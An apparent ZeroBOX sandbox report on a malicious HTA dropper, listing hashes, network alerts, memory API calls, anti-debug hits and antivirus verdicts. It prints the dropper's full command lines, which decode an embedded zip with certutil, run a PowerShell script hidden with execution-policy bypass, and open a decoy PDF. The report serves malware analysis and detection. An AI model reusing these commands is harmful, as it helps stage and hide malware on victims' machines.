Summary | ZeroBOX

sfmw.hta

AntiVM MSOffice File AntiDebug PowerShell
Category: FILE
Machine: s1_win7_x6402
Started: April 23, 2025, 12:09 p.m.
Completed: April 23, 2025, 12:11 p.m.
Size: 163.1KB
Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5: f32e7891e2cfc58230057a506325c3c8
SHA256: 02783530bbd8416ebc82ab1eb5bbe81d5d87731d24c6ff6a8e12139a5fe33cee
CRC32: F5A218AF
ssdeep: 3072:UPzcBmc2YlnFBQsDqzpj8sfZCQiItHU/j1ICbM+33Eci:Acz29RNxY71ICAG3Eci
Yara None matched

IP Address Status
164.124.101.2 Active
23.36.55.181 Active

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49173 -> 52.239.160.33:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49171 -> 52.239.160.33:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow: TLSv1 192.168.56.102:49173 -> 52.239.160.33:443
Issuer: C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 03
Subject: C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=*.web.core.windows.net
Fingerprint: 22:d9:a8:14:ff:86:7a:4b:f0:95:ea:b0:9f:c1:b5:62:6b:b0:62:a9

Flow: TLSv1 192.168.56.102:49171 -> 52.239.160.33:443
Issuer: C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 03
Subject: C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=*.web.core.windows.net
Fingerprint: 22:d9:a8:14:ff:86:7a:4b:f0:95:ea:b0:9f:c1:b5:62:6b:b0:62:a9

request GET http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 15929344
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000028e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003810000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bad000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bb4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdc44000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdad1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002f60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef69c9000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1184
region_size: 13242368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002de0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bad000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bb4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdc44000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdad1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077186000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772d6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077181000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076ba0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772af000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772bb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe117000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdbe4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdbe1000
process_handle: 0xffffffffffffffff
1 0 0
cmdline cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
filepath: cmd
1 1 0

CreateProcessInternalW

thread_identifier: 2120
thread_handle: 0x00000000000004ec
process_identifier: 2552
current_directory: C:\Users\test22\Desktop
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000004d8
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
filepath: cmd
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2144 CREDAT:145409
ALYac Trojan.Script.Agent
ESET-NOD32 VBS/TrojanDropper.Agent.PMU
TrendMicro-HouseCall TROJ_FRS.VSNTCP25
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.HTA.SAgent.gen
Rising Dropper.Agent/VBS!8.12129 (TOPIS:E0:ycYbowpsUbT)
TrendMicro Trojan.HTML.FRS.VSNW19C25
Ikarus Trojan-Dropper.VBS.Agent
Google Detected
GData HTML.Trojan.Agent.W50GPS
Varist ABTrojan.BKWY-
AhnLab-V3 Trojan/VBS.Obfuscated.SC261281
AVG Script:SNH-gen [Trj]
alibabacloud Trojan[dropper]:Win/Agent.PZW
parent_process iexplore.exe martian_process cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process iexplore.exe martian_process cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
parent_process iexplore.exe martian_process "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process iexplore.exe martian_process "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
Process injection Process 2144 resumed a thread in remote process 1184
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000360
suspend_count: 1
process_identifier: 1184
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window